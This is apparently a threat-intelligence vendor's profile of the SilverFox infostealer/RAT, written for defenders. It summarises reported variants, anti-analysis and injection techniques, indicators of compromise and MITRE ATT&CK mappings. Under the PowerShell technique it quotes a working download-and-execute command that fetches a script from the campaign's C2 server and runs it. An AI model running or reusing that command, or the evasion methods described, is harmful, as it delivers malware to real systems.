Skip to main content
Mallory
Back to malware
Malware

SilverFox

SilverFox is a Chinese-origin Windows malware family described as an infostealer/RAT and associated with trojanized software. Reporting cited here links it to campaigns targeting Chinese-speaking users and organizations, including HR or compliance-related targets, and notes Knownsec 404 reporting on the SilverFox group and malware being used by cybercrime groups.

A documented March 2026 SilverFox variant, tagged Trojan/SilverFox.bg[qtsc], was a 64-bit PE executable disguised as a Trend Micro Titanium installer and delivered with a Chinese-language lure filename, 2026第一季度违纪人员内部调查信息.exe. The binary used forged Trend Micro version metadata, lacked a valid Authenticode signature, and carried a forged future compile timestamp. Its logic was protected inside a custom virtual machine with a binary-search-tree dispatcher. The malware used ChaCha20 or a closely related Salsa20-style stream cipher to decrypt code and protect command-and-control data, stored encrypted payload blobs in the .rsrc section disguised as BITMAP resources, decrypted payloads in memory, executed shellcode, and supported staged execution. Reported anti-analysis included IsDebuggerPresent, NtQueryInformationProcess with ProcessDebugPort, NtRemoveProcessDebug, DbgUiSetThreadDebugObject, NtDuplicateObject, CPUID checks including Xen detection, and other anti-VM techniques. It also used VirtualProtect, CreateProcessAsUserW, WaitForDebugEvent, ContinueDebugEvent, CreateFileMappingW, and MapViewOfFile in support of process injection, hollowing, and inter-process communication. Its C2 channel used Microsoft RPC over ncacn_ip_tcp via NdrAsyncClientCall; the host and port were encrypted and not recoverable statically.

Separate reporting also described a multi-variant ZIP/LNK dropper campaign active from at least November 2025 through April 2026 in which MalwareBazaar samples tagged Sonbokli were also tagged with SilverFox. That campaign used malicious LNK files to launch obfuscated cmd.exe, BitsAdmin, PowerShell, and mshta.exe chains, retrieved HTA files, PowerShell scripts, and a trojanized Chrome executable, and used lures in Arabic and English. ReversingLabs classified that activity as Win32.Trojan.Sonbokli, and the final payload was assessed as possibly a SilverFox variant packed with DonutLoader, but this was not confirmed because the payloads were no longer retrievable. Reported infrastructure for that campaign included C2 server 46.161.0.94 and paths such as /Mirzbow/, /mirmLAT/, /smersh/, /course/, and /chromeupd.zip. High-confidence sample identifiers for the March 2026 SilverFox RAT include SHA256 e6d8944deced4b6ec228cb1af210eb19d527107af2688b401de5503174bc1fbe, SHA1 a46c59be8e82cb05d49f288cb28df2333ee53b2b, MD5 443a741c1cdde875e8bc0307d9a657c7, and imphash 03178db0411f49be0e26499ca1def241.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583.001DomainsEvidence1

All eleven 360news*.icu domains were bulk-registered on 2025-07-29 through Gname.com... The actor picked one cloud provider, one region, one registrar, and one personal Gmail account for the entire setup.

T1583.003Virtual Private ServerEvidence1

Every IP in that list, with the exception of 95.173.197.195, is Alibaba Cloud Hong Kong (AS45102). The actor picked one cloud provider, one region, one registrar, and one personal Gmail account for the entire setup.

Initial Access

4 techniques
T1189Drive-by CompromiseEvidence1

It's a single-IP SEO poisoning distribution hub running multiple thematic clusters... The software typosquat subcluster is the one worth staring at. The actor is impersonating a who's-who of desktop software across categories...

T1566PhishingEvidence1

For twelve operationally-named domains to all land on the same registrant email without privacy — and for that email to be a personal gmail.com address rather than a burner — is an operator OPSEC failure of the kind that normally gets scrubbed before the first phishing sample ever leaves the author's workstation.

T1566.001Spearphishing AttachmentEvidence1

Initial Access Phishing: Spearphishing Attachment T1566.001 ZIP file containing malicious LNK

T1566.002Spearphishing LinkEvidence1

The actor is impersonating a who's-who of desktop software across categories ... Browsers Firefox, Edge, 360 Browser ... Messaging Telegram ... Security Huorong antivirus ... Hosting fake 'Qihoo 360 Security' download pages under a .icu TLD is low-effort social engineering that only needs to fool the subset of users who don't check domain suffixes carefully.

Execution

1 technique
T1059.001PowerShellEvidence1

powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText))

Stealth

3 techniques
T1036MasqueradingEvidence1

The name "360news" is a deliberate typosquat of Qihoo 360 (奇虎360), the largest Chinese cybersecurity vendor. Hosting fake "Qihoo 360 Security" download pages under a .icu TLD is low-effort social engineering...

T1036.005Match Legitimate Resource Name or LocationEvidence1

Defense Evasion Masquerading: Match Legitimate Name T1036.005 LNK uses Excel/RTF icons, chrome.exe name

T1497Virtualization/Sandbox EvasionEvidence1

Behavioral Indicators (from VT sandbox) Indicator Detail Anti-Debug IsDebuggerPresent, GetTickCount timing checks Sleep Evasion Detect-debug-environment, long-sleeps

Discovery

1 technique
T1497Virtualization/Sandbox EvasionEvidence1

Behavioral Indicators (from VT sandbox) Indicator Detail Anti-Debug IsDebuggerPresent, GetTickCount timing checks Sleep Evasion Detect-debug-environment, long-sleeps

Command and Control

3 techniques
T1071Application Layer ProtocolEvidence1

Two suggestive names — jackadmin reads like a C2 admin panel hostname, jackbank reads like a banking trojan overlay / fraud panel hostname — repeated five times each as a pre-provisioned batch for when the previous set gets burned.

T1105Ingress Tool TransferEvidence1

Command and Control Ingress Tool Transfer T1105 BitsAdmin/PowerShell downloading payloads

T1568.002Domain Generation AlgorithmsEvidence1

The two random-string companions trnebaiek.cn and eijmdixci.cn are the classic Silver Fox random-string C2 domain shape.

INDICATORS OF COMPROMISE

IOCs tracked for this family

115 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
49 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
61 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
5 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app2 days ago
hash.sha256●●●●●●●●●●●●View more in app2 days ago
hash.sha256●●●●●●●●●●●●View more in app2 days ago
hash.sha256●●●●●●●●●●●●View more in app2 days ago
hash.sha256●●●●●●●●●●●●View more in app2 days ago
hash.sha256●●●●●●●●●●●●View more in app2 days ago
ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

3 SOURCESView more in app
breakglass intelNews
Apr 3, 2026
Operation MIRZBOW - LNK Dropper Campaign Targeting Arabic-Speaking Users - Breakglass Intelligence - Breakglass Intelligence

SilverFox is described as a Chinese-origin infostealer/RAT associated with trojanized software. In this campaign, the final trojanized chrome.exe payload may be a SilverFox variant.

Read more
breakglass intelNews
Mar 16, 2026
SilverFox Deploys VM-Obfuscated RAT with ChaCha20 Encryption and RPC-Based C2 Disguised as Trend Micro - Breakglass Intelligence - Breakglass Intelligence

A SilverFox RAT variant disguised as a Trend Micro Titanium installer. It hides logic inside a custom virtual machine with a binary search tree dispatcher, uses ChaCha20/Salsa20-style encryption for code and C2 payloads, performs anti-debugging and anti-VM checks, decrypts code in memory, injects into processes, and communicates with operators over Windows MSRPC using NdrAsyncClientCall.

Read more
risky biz rssNews
Aug 1, 2025
Risky Bulletin: Russia spies on foreign embassies using local ISPs

SilverFox is an infostealer malware used by cybercrime groups to target Chinese-speaking users, stealing credentials and sensitive information.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching115

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping13

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.